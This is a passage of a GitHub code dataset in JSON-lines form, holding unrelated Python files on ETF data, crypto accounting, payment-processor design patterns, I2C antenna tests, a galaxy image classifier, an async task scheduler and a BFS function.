all_ETF_ind.dropna(how='all', axis=1)\n select_ETF_ind = select_ETF_ind.dropna(how='all', axis=1)\n\n return all_ETF_ind,select_ETF_ind\n\nstart_date, end_date = 20160101, 20230601\nall_ETF_ind,select_ETF_ind = ETF_all_select(start_date, end_date, trading_fund=True, min_size = 0.5)\nall_ETF_ind.to_pickle('C:/Users/86181/Desktop/量化策略体系/all_ETF_ind.pkl')\nselect_ETF_ind.to_pickle('C:/Users/86181/Desktop/量化策略体系/select_ETF_ind.pkl')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"gftaoxin/StrategyPythonCode","sub_path":"AIndustryRotation/Agarbage/ETF_test.py","file_name":"ETF_test.py","file_ext":"py","file_size_in_byte":7103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74530361224","text":"from typing import List\nfrom senkalib.senka_lib import SenkaLib\nfrom senkalib.senka_setting import SenkaSetting\nfrom senkalib.caaj_journal import CaajJournal\nfrom senka.plugin_manager import PluginManager\nimport pandas as pd\nimport os\n\nclass Senka:\n def __init__(self, setting_dict):\n self.setting = SenkaSetting(setting_dict)\n pass\n \n def get_caaj_csv(self, chain:str, address:str) -> str:\n caaj_list = self.get_caaj(chain, address)\n caaj_dict_list = map(lambda x: vars(x), caaj_list)\n df = pd.DataFrame(caaj_dict_list)\n df = df.sort_values('time')\n caaj_csv = df.to_csv(None, index=False)\n return caaj_csv\n\n def get_caaj(self, chain:str, address:str) -> List[CaajJournal]:\n available_chains = self.get_available_chains()\n if chain.lower() not in available_chains:\n raise ValueError('this chain is not supported.')\n\n caaj = []\n transaction_generator = list(filter(lambda x:x.chain.lower() == chain.lower(),SenkaLib.get_available_chain()))[0]\n transactions = transaction_generator.get_transactions(self.setting, address)\n plugins = PluginManager.get_plugins(chain, self.get_plugin_dir_path())\n\n for transaction in transactions:\n for plugin in plugins:\n if plugin.can_handle(transaction):\n caaj_peace = plugin.get_caajs(address, transaction)\n caaj.extend(caaj_peace)\n\n return caaj\n\n\n\n def 
get_available_chains(self) -> List[str]:\n chains = SenkaLib.get_available_chain()\n chains = list(map(lambda x:x.chain,chains))\n return chains\n\n def get_plugin_dir_path(self) -> str:\n return '%s/../plugin' % os.path.dirname(__file__)","repo_name":"yuma300/senka_ci_test","sub_path":"src/senka/senka.py","file_name":"senka.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30243561976","text":"# Dependency Inversion\n\n# When a class depends on abstraction \n# of other concrete subclasses\n\n# Analysis\n# Payments are depending of a specific authorizer\n\n# Solution\n# Create an abstract class for implements authorizers\n# Now we can add easily a new authorization method\n\n\n\nfrom abc import ABC, abstractmethod\n\n\nclass Order:\n items = []\n quantities = []\n prices = []\n status = \"open\"\n \n def add_item(self, name, quantity, price):\n self.items.append(name)\n self.quantities.append(quantity)\n self.prices.append(price)\n \n def total_price(self):\n total = 0\n for i in range(len(self.prices)):\n total += self.quantities[i] * self.prices[i]\n return total\n\n\nclass Authorizer(ABC):\n @abstractmethod\n def is_authorized(self) -> bool: ...\n \n \nclass SMSAuth(Authorizer):\n authorized = False\n \n def verify_code(self, code):\n print(f\"Verifying SMS code = {code}\")\n self.authorized = True\n \n def is_authorized(self):\n return self.authorized\n \n\nclass NotARobot(Authorizer):\n authorized = False\n \n def not_a_robot(self):\n print(\"Are you a robot? Naaa....\")\n self.authorized = True\n \n def is_authorized(self):\n return self.authorized \n\n\nclass PaymentProcessor(ABC):\n @abstractmethod\n def pay(self, order): ...\n \n \n\nclass DebitPaymentProcessor(PaymentProcessor):\n # passing a general authorizer\n def __init__(self, security_code, authorizer: Authorizer):\n self.security_code = security_code\n self.authorizer = authorizer\n \n \n def pay(self, order):\n if not self.authorizer.is_authorized():\n raise Exception(\"Not authorized!\")\n print(\"Processing debit payment type\")\n print(f\"Verifying security code: {self.security_code}\")\n order.status = \"paid\"\n\n\nclass CreditPaymentProcessor(PaymentProcessor):\n def __init__(self, security_code):\n self.security_code = security_code\n \n def pay(self, order):\n print(\"Processing debit payment type\")\n print(f\"Verifying security code: {self.security_code}\")\n order.status = \"paid\"\n\n \n \nclass PayPalPaymentProcessor(PaymentProcessor):\n def __init__(self, email, authorizer: Authorizer):\n self.authorizer = authorizer\n self.email = email\n \n def pay(self, order):\n if not self.authorizer.is_authorized():\n raise Exception(\"Not authorized!\")\n print(\"Processing PayPal payment type\")\n print(f\"Verifying email: {self.email}\")\n order.status = \"paid\"\n \n\norder = Order()\n\norder.add_item(\"Keyboard\", 1, 50)\norder.add_item(\"SSD\", 1, 150)\norder.add_item(\"USB cable\", 2, 5)\nprint(order.total_price())\n\n\nprint(\"\\n Paypal with composition\")\nauthorizer = NotARobot()\nprocessor_paypal = PayPalPaymentProcessor(\"email@email.com\", authorizer)\nauthorizer.not_a_robot()\nprocessor_paypal.pay(order)\n\n","repo_name":"carlosmab/SOLID-python","sub_path":"D_dependency_inversion.py","file_name":"D_dependency_inversion.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3161906279","text":"from 
collections import deque\nfrom copy import copy\n\nfrom acc_utils.errors import CompilerError\nfrom config import cfg\n\n\nclass Snapshot(object):\n def __init__(self):\n self._reserved_banks = None\n self._available_queue = None\n self._mapping_info = None\n\n def backup(self, fmem_info):\n self._reserved_banks = copy(fmem_info._reserved_banks)\n self._available_queue = copy(fmem_info._available_queue)\n self._mapping_info = copy(fmem_info._mapping_info)\n\n def restore(self, fmem_info):\n fmem_info._reserved_banks = copy(self._reserved_banks)\n fmem_info._available_queue = copy(self._available_queue)\n fmem_info._mapping_info = copy(self._mapping_info)\n\n\nclass FMEMInfo(object):\n def __init__(self):\n self._reserved_banks = set([])\n self._available_queue = deque([i for i in range(cfg.MIDAP.FMEM.NUM)])\n self._mapping_info = []\n self._snapshot = Snapshot()\n\n def backup(self):\n self._snapshot.backup(self)\n\n def restore(self):\n self._snapshot.restore(self)\n\n def discard_data_by_layer(self, name, reverse_order=False):\n discard_list = []\n for idx, data in enumerate(self._mapping_info):\n n = data[0]\n if n == name:\n discard_list.append(idx)\n\n # discard the data in the order used by CIMs. (available_queue)\n for idx in (reversed(discard_list) if reverse_order else discard_list):\n _, bank, _ = self._mapping_info[idx]\n if reverse_order:\n self._available_queue.appendleft(bank)\n else:\n self._available_queue.append(bank)\n self._reserved_banks.discard(bank)\n\n for idx in reversed(discard_list):\n del self._mapping_info[idx]\n\n def discard_data(self, bank):\n discard_idx = -1\n for idx, data in enumerate(self._mapping_info):\n b = data[1]\n if b == bank:\n discard_idx = idx\n break\n\n if bank not in self._reserved_banks:\n self._available_queue.append(bank)\n del self._mapping_info[discard_idx]\n\n def _pop_available_bank(self):\n if not self._available_queue:\n return None\n bank = self._available_queue.popleft()\n return bank\n\n def get_num_available_bank(self):\n return len(self._available_queue)\n\n def get_num_unreserved_bank(self):\n return cfg.MIDAP.FMEM.NUM - len(self._reserved_banks)\n\n def save_data_to_empty_bank(self, layer, data):\n name = layer.name\n\n # FIXME check that data is already in fmem.\n for n, b, d in self._mapping_info:\n if name == n and d == data:\n return None\n\n bank = self._pop_available_bank()\n if bank is not None:\n self._save_data(name, bank, data)\n return bank\n\n def _save_data(self, name, bank, data):\n self._mapping_info.append((name, bank, data))\n\n if len(self._mapping_info) > cfg.MIDAP.FMEM.NUM:\n raise CompilerError(\"Use more banks than exists: \" + str(self._mapping_info) + self.__repr__())\n\n def reverse_mapping(self, name):\n mapping_list = []\n discard_list = []\n for idx, data in enumerate(self._mapping_info):\n n = data[0] if data else None\n if n == name:\n mapping_list.append(data)\n discard_list.append(idx)\n\n for idx in reversed(discard_list):\n del self._mapping_info[idx]\n self._mapping_info = self._mapping_info + list(reversed(mapping_list))\n\n def reserve_input_banks(self, mapping, input_stationary):\n if mapping and input_stationary >= 0:\n banks = [v[0] for v in mapping[:input_stationary]]\n self._reserved_banks = set(banks)\n\n def reserve_output_banks(self, next_layer, output_stationary):\n # FIXME\n # set output bank once per path(or branch)\n for data in self._mapping_info:\n n = data[0] if data else None\n if n == next_layer.name:\n return\n\n fragments = 
next_layer.get_output_fragments(cfg.MIDAP.FMEM.NUM - 1)\n for f in fragments[:output_stationary]:\n bank = self.save_data_to_empty_bank(next_layer, f)\n if bank is None:\n raise CompilerError(\"There is no bank to save output of \" + next_layer.name + \" \" + self.__repr__())\n self._reserved_banks.add(bank)\n\n def get_fmem_mapping_info(self, name):\n mapping = []\n for data in self._mapping_info:\n n = data[0] if data else None\n if n == name:\n mapping.append([data[1], data[2], False])\n return mapping\n\n def __repr__(self):\n usage = ['O'] * cfg.MIDAP.FMEM.NUM\n for data in self._mapping_info:\n usage[data[1]] = data[0]\n return \"FMEM Available Bank {}\".format(usage)\n","repo_name":"cap-lab/MidapSim","sub_path":"midap_software/fmem_info.py","file_name":"fmem_info.py","file_ext":"py","file_size_in_byte":4964,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"12298259847","text":"from pyftdi import i2c\nfrom time import sleep\n\n# Commands without parameters and response\ninitial_commands = [\n b\"\\xAA\", # RESET\n b\"\\xAC\", # DISARM\n b\"\\xAD\", # ARM ANTENNA SYSTEM\n b\"\\xA9\", # CANCEL DEPLOY SYSTEM ACTIVATION\n]\n\n# Commands with parameters but with no response\ndeploy_commands = [\n b\"\\xA1\", # DEPLOY ANTENNA 1\n b\"\\xA2\", # DEPLOY ANTENNA 2\n b\"\\xA3\", # DEPLOY ANTENNA 3\n b\"\\xA4\", # DEPLOY ANTENNA 4\n b\"\\xA5\", # DEPLOY SEQUENCIAL\n b\"\\xBA\", # DEPLOY ANTENNA 1 OVERRIDE\n b\"\\xBB\", # DEPLOY ANTENNA 2 OVERRIDE\n b\"\\xBC\", # DEPLOY ANTENNA 3 OVERRIDE\n b\"\\xBD\", # DEPLOY ANTENNA 4 OVERRIDE\n]\n\n# Commands with 2 byte responses and no parameters\nreport_2b_commands = [\n b\"\\xB4\", # REPORT DEPLOY TIME 1\n b\"\\xB5\", # REPORT DEPLOY TIME 2\n b\"\\xB6\", # REPORT DEPLOY TIME 3\n b\"\\xB7\", # REPORT DEPLOY TIME 4\n b\"\\xC3\", # REPORT DEPLOYMENT STATUS\n b\"\\xC0\", # MEASURE TEMPERATURE\n]\n\n# Commands with 1 byte responses and no parameters\nreport_1b_commands = [\n b\"\\xB0\", # REPORT DEPLOY COUNTER 1\n b\"\\xB1\", # REPORT DEPLOY COUNTER 2\n b\"\\xB2\", # REPORT DEPLOY COUNTER 3\n b\"\\xB3\", # REPORT DEPLOY COUNTER 4\n]\n\n# Responses for report_2b_commands\nresponses_2b: list[str] = [\n \"Should return deploy_timer_1 | 0x02 0x00\",\n \"Should return deploy_timer_2 | 0x02 0x00\",\n \"Should return deploy_timer_3 | 0x02 0x00\",\n \"Should return deploy_timer_4 | 0x02 0x00\",\n \"Should return deploy_status | 0xFF 0xFF\",\n \"Should return 11 bits of temperature | 0x03 0xFF\",\n]\n\n# Responses for report_1b_commands\nresponses_1b: list[str] = [\n \"Should return deploy_counter_1 | 0x02\",\n \"Should return deploy_counter_2 | 0x02\",\n \"Should return deploy_counter_3 | 0x02\",\n \"Should return deploy_counter_4 | 0x02\",\n]\n\nctrl = i2c.I2cController()\n\n# Mudar para o valor real\nctrl.configure(\"ftdi:232h\")\n\nport = ctrl.get_port(0x31)\n\ntry: \n# TESTING COMMANDS WITHOUT PARAMETERS/RESPONSE\n for cmd in initial_commands:\n print(f\"Data transmitted from master via i2c: {cmd}\")\n port.write(cmd)\n sleep(10)\n\n# TESTING COMMANDS WITHOUT RESPONSE, BUT WITH PARAMETERS\n for cmd in deploy_commands:\n print(f\"Data transmitted from master via i2c: {cmd}\")\n port.write(cmd, relax=False)\n port.write(cmd)\n sleep(10)\n\n# TESTING COMMANDS WITHOUT PARAMETERS, BUT WITH 1 BYTE RESPONSE\n for idx, cmd in enumerate(report_1b_commands):\n rx = port.exchange(cmd)\n print(f\"{responses_1b[idx]}, actual response is {rx}\")\n sleep(10)\n\n# TESTING COMMANDS WITHOUT PARAMETERS, BUT WITH 2 BYTE 
RESPONSE\n for idx, cmd in enumerate(report_2b_commands):\n port.write(cmd)\n rx = port.read(2)\n print(f\"{responses_2b[idx]}, actual response is {rx}\")\n sleep(10)\n\nexcept: \n print(\"Something went wrong in communication\")\n ctrl.terminate()\n","repo_name":"c-porto/i2c-test","sub_path":"ftdi-client/simulated.py","file_name":"simulated.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37507761632","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nNUM_INTERVALS = 100\n\narr = np.loadtxt(\"uni.dat\", dtype=\"double\")\n\nbuckets = np.linspace(-2, 3, num=NUM_INTERVALS)\nfreqs = []\n\ndef pdf(x):\n if x > 0 and x < 1:\n return 1\n else:\n return 0\n\nvf = np.vectorize(pdf)\n\n# theoretical = np.where(np.logical_and(buckets > 0, buckets < 1), 1, 0)\ntheoretical = vf(buckets)\n\nfor i in range(NUM_INTERVALS):\n freqs.append(np.sum(arr < buckets[i]) / len(arr))\n\nslopes = []\n\nfor i in range(NUM_INTERVALS - 1):\n slopes.append((freqs[i+1] - freqs[i]) / (buckets[i+1] - buckets[i]))\n\nplt.plot(buckets[:-1], slopes, 'o', label='Experimental')\nplt.plot(buckets, theoretical, '-', label='Theoretical')\nplt.legend()\nplt.grid()\nplt.savefig('../figs/pdf_uni.png')\nplt.show()\n","repo_name":"kst164/AI1110-Assignments","sub_path":"rand_nums/codes/pdf_uni.py","file_name":"pdf_uni.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70165309704","text":"import logging\nfrom datetime import datetime\nfrom pathlib import Path\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tensorflow.keras.layers import (Conv2D, Dense, Dropout, Flatten,\n MaxPooling2D)\nfrom tensorflow.keras.metrics import CosineSimilarity\nfrom tensorflow.keras.models import Sequential, model_from_json\nfrom tensorflow.keras.optimizers import Adadelta\n\nfrom src.data.model_data_set import ModelDataset\nfrom src.model.model_constants import DATA_LABELS\nfrom src.model.get_ROC_curve import get_ROC_curve\nfrom src.model.get_confusion_matrix import get_confusion_matrix\n\nlogger = logging.getLogger(__name__)\n\nclass GalaxyModel:\n def __init__(self, model_info, config):\n self.model_info = model_info\n self.config = config\n self.model_data_set = ModelDataset(model_info, config)\n self.model = None\n\n def get_new_model(self):\n raise NotImplementedError\n\n def compile_model(self):\n raise NotImplementedError\n\n def load_model(self):\n model_directory = Path(self.config[\"model_path\"])\n model_name = self.model_info.model_name\n\n self.model = tf.keras.models.load_model(str(model_directory/model_name))\n return self.model\n\n def save_model(self):\n if self.model is None:\n raise ValueError(\"No model is defined\")\n\n model_directory = self.config[\"model_path\"]\n model_name = self.model_info.model_name\n \n save_path = Path(model_directory) / model_name\n\n self.model.save(str(save_path))\n\n def _get_training_callbacks(self, callbacks):\n _callbacks = []\n\n if callbacks is not None:\n for callback in callbacks:\n _callbacks.append(callback)\n\n model_name = self.model_info.model_name\n enable_tensorboard = self.config.get('enable_tensorboard', False)\n enable_early_stopping = self.config.get('enable_earlystopping', False)\n\n if enable_tensorboard:\n # Setup tensorboard logs\n log_dir = Path(self.config.get('log_dir', 'logs/fit'))\n \n today_date_time_str = 
datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n log_dir=log_dir / f\"{model_name}-{today_date_time_str}\"\n\n _callbacks.append(\n tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1, profile_batch=0)\n )\n if enable_early_stopping:\n _callbacks.append(\n tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5)\n )\n \n return _callbacks\n\n def train(self, train_data_set, validation_data_set, callbacks=None):\n epochs = self.config[\"epochs\"]\n callbacks = self._get_training_callbacks(callbacks)\n \n return self.model.fit(\n train_data_set,\n steps_per_epoch=50,\n epochs=epochs,\n validation_data=validation_data_set,\n validation_steps=50,\n verbose=0,\n callbacks=callbacks\n )\n\nclass GalaxyModelClassifier(GalaxyModel):\n def get_new_model(self):\n # Get model parameters\n image_height = self.config[\"image_height\"]\n image_width = self.config[\"image_width\"]\n image_channels = self.model_info.model_config.get(\"numChannels\")\n \n # Build model architecture\n model = Sequential()\n model.add(Conv2D(32, kernel_size=(3, 3),\n activation='relu',\n input_shape=(image_height, image_width, image_channels)))\n model.add(Conv2D(64, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n model.add(Flatten())\n model.add(Dense(128, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(len(DATA_LABELS), activation='softmax'))\n\n # return model\n self.model = model\n\n def compile_model(self):\n if self.model is None:\n raise ValueError(\"No model is defined\")\n\n self.model.compile(\n loss=tf.keras.losses.categorical_crossentropy,\n optimizer=Adadelta(),\n metrics=['MSE', 'accuracy', 'AUC']\n )\n\n def _get_predictions(self, testing_data_set):\n predict, correct = [], []\n predict_scores, correct_scores = [], []\n \n for image, label in testing_data_set:\n predictions = self.model.predict(image)\n\n for i in range(predictions.shape[0]):\n predict.append(np.argmax(predictions[i]))\n correct.append(np.argmax(label[i]))\n\n predict_scores.append(predictions[i])\n correct_scores.append(label[i])\n\n return (predict, predict_scores, correct, correct_scores)\n\n def evaluate_model(self, testing_data_set, ex):\n if self.model is None:\n raise ValueError(\"No model is defined\")\n\n predict, predict_scores, correct, correct_scores = self._get_predictions(testing_data_set)\n\n ROC_curve = get_ROC_curve(predict_scores, correct_scores)\n conf_mtrx = get_confusion_matrix(predict, correct)\n\n ex.add_artifact(ROC_curve.name, name=\"ROC_Curve.png\", content_type=\"image/png\")\n ex.add_artifact(conf_mtrx.name, name=\"Confusion_Matrix.png\", content_type=\"image/png\")\n\n ROC_curve.close()\n conf_mtrx.close()\n\nif __name__==\"__main__\":\n from src.config.load_workbook import load_workbook\n from src.config.load_config import load_config\n from src.model.model_info import ModelInfo\n \n config = load_config(\"config.yml\")\n config[\"epochs\"] = 10\n model_config_dict, data_files_dict = load_workbook(config)\n\n model_info = ModelInfo(\"2_channel_categorical_gas_density_star_density_m1m2m3\", model_config_dict, data_files_dict)\n\n m = GalaxyModelClassifier(model_info, config)\n\n m.get_new_model()\n m.compile_model()\n \n t, tr, v = m.model_data_set.load_model_data_set()\n\n m.train(tr, 
v)\n","repo_name":"asafsilman/GalaxyEnvironmentAnalysis","sub_path":"src/model/galaxy_model.py","file_name":"galaxy_model.py","file_ext":"py","file_size_in_byte":6024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13714477599","text":"import json\nimport logging\nfrom abc import ABC, abstractmethod\nfrom pathlib import Path\nfrom typing import Dict, List, Optional, Tuple, Union\n\nfrom gtmcore.data.config.err.configurationfilenotcreated import \\\n ConfigurationFileNotCreated\n\nConfigValueType = Optional[Union[int, str, float, bool, Dict, List, Tuple]]\n\n\nclass BaseConfiguration(ABC):\n \"\"\" The class responsible for creating and loading a per service configuration.\n \"\"\"\n\n def __init__(self) -> None:\n self.config_path: Path = Path(\n \"config/\" + self.get_config_module_str() + \"/settings.json\").absolute()\n self.__config: Dict[str, ConfigValueType] = {}\n if not self.check_config_file_exists():\n self.create_config_file()\n logging.info(\"[GTMCORE] The configuration file for module '%s' has been created.\",\n self.get_config_module_str())\n self.load_config()\n\n def check_config_file_exists(self) -> bool:\n \"\"\" Checks if there is an existing configuration file in the service config path.\n\n Returns:\n bool: If the config file has been found or not.\n \"\"\"\n try:\n return self.config_path.is_file()\n except OSError:\n return False\n\n def create_config_file(self) -> None:\n \"\"\" Creates or recreates the configuration file with the default template.\n\n Raises:\n ConfigurationFileNotCreated: Thrown when the configuration file could not be created.\n \"\"\"\n try:\n config_template: dict = self.get_config_template()\n self.config_path.parent.mkdir(parents=True, exist_ok=True)\n with self.config_path.open(\"w+\", encoding=\"utf-8\") as config_file:\n json.dump(config_template, config_file, indent=4)\n except OSError as err:\n raise ConfigurationFileNotCreated(\n f\"The configuration file for '{self.get_config_module_str()}'\"\n \" could not be created\"\n ) from err\n\n def load_config(self):\n \"\"\" Loads the keys and values from the configuration file.\n \"\"\"\n with self.config_path.open(\"r\", encoding=\"utf-8\") as config_file:\n self.__config = json.load(config_file)\n\n def get_config(self) -> Dict[str, ConfigValueType]:\n \"\"\" Gets the dictionary with all the configuration keys and values.\n\n Returns:\n Dict[str, ConfigValueType]: A dictionary with all the configuration keys and values.\n \"\"\"\n return self.__config\n\n def get_value(self, key: str) -> Optional[ConfigValueType]:\n \"\"\" Gets the value associated with the key in the configuration file.\n\n Args:\n key (str): The key from the configuration file.\n\n Returns:\n Optional[ConfigValueType]: The value associated with the key or None if not found.\n \"\"\"\n try:\n return self.__config.get(key)\n except KeyError:\n return None\n\n def set_value(self, key: str, value: ConfigValueType) -> None:\n \"\"\" Sets the value associated with the key in the configuration.\n\n Args:\n key (str): The key of the configuration paramether.\n value (ConfigValueType): The value of the configuration paramether.\n\n Raises:\n TypeError: Thrown when the configuration file could not be created.\n \"\"\"\n try:\n self.__config[key] = value\n except TypeError as err:\n raise TypeError(\n f\"Incorrect value detected for key '{key}'\" +\n f\"at configuration file for '{self.get_config_module_str()}'.\") from err\n\n @abstractmethod\n def 
get_config_template(self) -> Dict[str, ConfigValueType]:\n \"\"\" Gets the template of the configuration file.\n\n Returns:\n Dict[str, ConfigValueType]: Dictionary with the configuration file format.\n \"\"\"\n return {}\n\n @abstractmethod\n def get_config_module_str(self) -> str:\n \"\"\" Gets the configuration module name string.\n\n Returns:\n str: The configuration module name string.\n \"\"\"\n return \"\"\n","repo_name":"MrpYA45/github-text-mining-tfg","sub_path":"src/backend/gtmcore/gtmcore/data/config/baseconfiguration.py","file_name":"baseconfiguration.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"9680795619","text":"import asyncio\nimport logging\nfrom datetime import datetime, timedelta\nfrom typing import Callable, Optional\nfrom easyschedule.cron import get_schedule_delay\n\nclass EasyScheduler:\n def __init__(\n self,\n logger: Optional[logging.Logger] = None,\n debug: Optional[bool] = False\n ):\n self.scheduled_tasks = {}\n self.single_tasks = []\n self.loop = None\n ## logging\n level = 'DEBUG' if debug else None\n self.setup_logger(logger=logger, level=level)\n \n def setup_logger(\n self, \n logger: logging.Logger = None, \n level: str = None\n ) -> None:\n if logger == None:\n level = logging.DEBUG if level == 'DEBUG' else logging.WARNING\n logging.basicConfig(\n level=level,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M:%S'\n )\n self.log = logging.getLogger(f'EasyScheduler')\n self.log.propogate = False\n else:\n self.log = logger\n def __call__(\n self,\n schedule: str,\n default_args: dict = {'args': [], 'kwargs': {}}\n ) -> Callable:\n if not 'args' in default_args:\n default_args['args'] = []\n if not 'kwargs' in default_args: \n default_args['kwargs'] = {}\n def scheduler(func):\n async def scheduled(*args, **kwargs):\n result = func(*args, **kwargs)\n if asyncio.iscoroutine(result):\n result = await result\n return result\n scheduled.__name__ = func.__name__\n self.scheduled_tasks[scheduled.__name__] = {\n 'func': scheduled,\n 'schedule': schedule,\n 'default_args': default_args\n }\n if self.loop:\n self.schedule_task(scheduled.__name__)\n return func\n return scheduler\n def schedule(\n self, \n task: Callable, \n schedule: str,\n default_args: dict = {}\n ):\n \"\"\"\n schedule a recurring task \n \"\"\"\n self(schedule=schedule, default_args=default_args)(task)\n def run_once(\n self,\n func: Callable,\n date: Optional[datetime] = None,\n date_string: Optional[str] = None,\n delta: Optional[timedelta] = None,\n now: Optional[bool] = False,\n on_event: Optional[str] = None,\n default_args: Optional[dict] = None,\n ):\n time_now = datetime.now()\n delay = None\n if date and date >= time_now:\n delay = date - time_now\n if date_string:\n date = datetime.fromisoformat(date_string)\n if date >= time_now:\n delay = date - time_now\n if delta:\n if not isinstance(delta, timedelta):\n raise Exception(f\"delta is type {type(delta)}, expected {timedelta}\")\n delay = delta.total_seconds()\n if now:\n delay = datetime.now() - time_now\n if isinstance(delay, timedelta):\n delay = delay.total_seconds()\n\n if not default_args:\n default_args = {}\n if not 'args' in default_args:\n default_args['args'] = []\n if not 'kwargs' in default_args:\n default_args['kwargs'] = {}\n\n if on_event and on_event == 'shutdown':\n async def shutdown_task():\n try:\n while True:\n await asyncio.sleep(60)\n except 
asyncio.CancelledError:\n time_now = datetime.now()\n self.log.warning(f\"shutdown task {func.__name__} triggered at {time_now}\")\n try:\n await func(*default_args['args'], **default_args['kwargs'])\n except Exception as e:\n self.log.exception(f\"error running shutdown task - {task}\")\n return\n\n if self.loop:\n asyncio.create_task(shutdown_task())\n else:\n self.single_tasks.append(shutdown_task)\n return\n \n async def single_task():\n try:\n run_time = time_now + timedelta(seconds=delay)\n self.log.warning(f\"single task {func.__name__} scheduled to run at {run_time} in {delay} s\")\n await asyncio.sleep(delay)\n try:\n await func(*default_args['args'], **default_args['kwargs'])\n except Exception as e:\n if isinstance(e, asyncio.CancelledError):\n raise e\n self.log.exception(f\"error running single task - {func.__name__}\")\n except asyncio.CancelledError:\n return\n \n if self.loop:\n asyncio.create_task(single_task())\n else:\n self.single_tasks.append(single_task)\n return\n def once(\n self,\n date: Optional[datetime] = None,\n date_string: Optional[str] = None,\n delta: Optional[timedelta] = None,\n now: Optional[bool] = False,\n default_args: Optional[dict] = None\n ):\n \"\"\"\n Decoractor\n runs a single task at at input date, date_string, delta, now \n \"\"\"\n def once_decorator(func):\n self.run_once(\n func,\n date=date,\n date_string=date_string,\n delta=delta,\n now=now,\n default_args=default_args\n )\n return func\n return once_decorator\n def startup(\n self,\n default_args: Optional[dict] = None\n ) -> Callable:\n \"\"\"\n decorator\n runs a single task right after scheduler.start()\n Optional:\n default_args = {'args': [], 'kwargs': {}}\n \"\"\"\n if self.loop and self.loop.is_running():\n raise Exception(f\"scheduler has already started - cannot add startup tasks\")\n def startup_decor(func):\n\n self.run_once(\n func,\n now=True,\n default_args=default_args\n )\n return func\n return startup_decor \n def delayed_start(\n self,\n delay_in_seconds: int = 60,\n default_args: Optional[dict] = None\n ): \n \"\"\"\n decorator\n runs a single task after scheduler.start() with a delay\n \n delay_in_seconds: int = 60 #Default\n Optional:\n default_args = {'args': [], 'kwargs': {}}\n \"\"\"\n def delayed_start_decor(func):\n self.run_once(\n func,\n delta=timedelta(seconds=delay_in_seconds),\n default_args=default_args\n )\n return func\n return delayed_start_decor\n def shutdown(\n self,\n default_args: Optional[dict] = None\n ):\n \"\"\"\n decorator\n runs a single task after shutdown is detected\n \n Optional:\n default_args = {'args': [], 'kwargs': {}}\n \"\"\"\n def shutdown_decor(func):\n self.run_once(\n func,\n default_args=default_args,\n on_event='shutdown'\n )\n return func\n return shutdown_decor\n \n \n def schedule_task(self, task: str) -> None:\n async def scheduled_task():\n try:\n while True:\n func = self.scheduled_tasks[task]['func']\n schedule = self.scheduled_tasks[task]['schedule']\n default_args = self.scheduled_tasks[task]['default_args']\n next_run_time, delay = get_schedule_delay(schedule)\n self.log.warning(f\"{task} next_run_time: {next_run_time} - default_args: {default_args}\")\n await asyncio.sleep(delay)\n try:\n await func(*default_args['args'], **default_args['kwargs'])\n except Exception as e:\n self.log.exception(f\"error running scheduled task - {task}\")\n except asyncio.CancelledError:\n return\n self.log.debug(f\"schedule_task called for {self.scheduled_tasks[task]}\")\n self.scheduled_tasks[task]['task'] = 
self.loop.create_task(\n scheduled_task()\n )\n async def start(self):\n if not self.loop:\n self.loop = asyncio.get_running_loop()\n for task in self.scheduled_tasks:\n self.schedule_task(task)\n for task in self.single_tasks:\n asyncio.create_task(task())\n try:\n while True:\n await asyncio.sleep(60)\n except asyncio.CancelledError:\n return","repo_name":"codemation/easyschedule","sub_path":"easyschedule/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":8910,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"81"} +{"seq_id":"70015070344","text":"# S is index, G is adjacancy list\n# finds distance from S to all verticies in G\ndef bfs(S, G):\n q = [S]\n INF = 10**18\n dist = [INF]*len(G)\n dist[S] = 0\n while q:\n q2 = []\n for u in q:\n for v in G[u]: \n # early break here if only interesed in length of S -> T path.\n if dist[u] + 1 < dist[v]:\n dist[v] = dist[u] + 1\n q2.append(v)\n q = q2\n return dist","repo_name":"exoji2e/notebook","sub_path":"src/graphs/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"81"} +{"seq_id":"20639592082","text":"from blastermodel import blasterModel \nfrom Jacobian_POC_Solver import Jacobian_POC_Solver\nimport numpy as np\nimport time\nfrom matplotlib import pyplot as plt\nfrom casadi import *\n\nif __name__ == \"__main__\":\n\n # GENERATE REQUIRED CONTROLLER AND INTEGRATOR\n\n mass = 9.0\n J = np.eye(3)\n J[0, 0] = 0.50781\n J[1, 1] = 0.47314\n J[2, 2] = 0.72975\n l_x = 0.3434 \n l_y = 0.3475\n N = 60\n Tf = 2.0\n yaw_coefficient = 0.03\n blastThruster = 2.2*9.81\n Q = np.zeros((17, 17))\n np.fill_diagonal(Q, [1e3, 1e3, 1e3, 1e3, 1e3, 1e3, 0.5e1, 0.5e1, 0.5e1, 1e1, 1e1, 